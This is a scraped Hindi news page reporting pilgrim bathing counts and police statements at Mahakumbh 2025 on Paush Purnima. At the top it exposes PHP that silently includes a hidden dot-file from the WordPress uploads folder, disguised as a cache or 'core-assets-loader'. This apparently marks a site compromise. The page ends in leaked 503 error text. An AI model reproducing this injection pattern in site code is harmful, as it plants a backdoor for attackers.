add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Mahakumbh Live Updates: पौष पूर्णिमा पर महाकुंभ में सुबह 9:30 बजे तक 60 लाख श्रद्धालुओं ने किया पवित्र स्नान – SOCH INDIA
Menu

देश
Mahakumbh Live Updates: पौष पूर्णिमा पर महाकुंभ में सुबह 9:30 बजे तक 60 लाख श्रद्धालुओं ने किया पवित्र स्नान

nobanner

महाकुंभ 2025 पर DIG वैभव कृष्ण ने कहा, “अनुमानित आंकड़ा 50 लाख के करीब है. अब तक इतने लोग स्नान कर चुके होंगे. व्यवस्था ठीक चल रही है. भीड़ नियंत्रण और ट्रैफिक की व्यवस्था ठीक तरीके से हो रही है. हमारी जितनी भी व्यवस्थाएं हैं वो काफी पर्याप्त है.”

पौष पूर्णिमा पर महाकुंभ में त्रिवेणी संगम तट पर स्नान पर्व के दौरान सुबह 9:30 बजे तक 60 लाख से ज्यादा श्रद्धालु डुबकी लगा चुके हैं. यहां श्रद्धालुओं के लिए पुख्ता सुरक्षा के इंतजाम किए गए हैं. अधिकारी खुद इंतजामों की निगरानी कर रहे हैं.

ADG भानु भास्कर ने कहा, “मेला प्रशासन पूरी तरह से सतर्क है. सुबह 3 बजे से सभी बल तैनात हैं. जहां स्नान हो रहा है वहां पर पूरे पुलिस बंदोबस्त हैं. सभी अधिकारी लगातार निगरानी कर रहे हैं. कहीं भी कोई समस्या नहीं है. जहां भी कोई छोटी घटना घट रही है, तत्काल पुलिस वहां पहुंचकर कार्रवाई कर रही है.”

उत्तर प्रदेश के DGP प्रशांत कुमार ने कहा, “महाकुंभ 2025 का शुभारंभ आज सुबह के स्नान से हो गया है, करीब 60 लाख लोग इसमें डुबकी लगा चुके हैं. इस बार का कुंभ आस्था और आधुनिकता का संगम है. हम लोगों ने पारंपरिक पुलिस व्यवस्था से हटकर तकनीक का अधिक से अधिक इस्तेमाल कर श्रद्धालुओं को बेहतर व्यवस्था दी है. आज पुष्प वर्षा भी होगी. सब कुछ सुचारू और निर्बाध रूप से चल रहा है. इस बार कुंभ भव्य, दिव्य, डिजिटल और सुरक्षित हो, इसके लिए सभी इंतजाम किए जा रहे हैं.”

पौष पूर्णिमा पर सुबह 9 बजे तक तकरीबन 50 लाख श्रद्धालुओं ने संगम स्नान किया है. अभी तक स्नान सकुशल संपन्न हुआ है. इस दौरान सुरक्षा के पुख्ता इंतजाम किए गए हैं. वहीं सुबह 7.30 बजे तक यूपी सरकार द्वारा जारी अधिकारिक आंकड़े के अनुसार, 35 लाख श्रद्धालुओं ने पवित्र स्नान किया है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.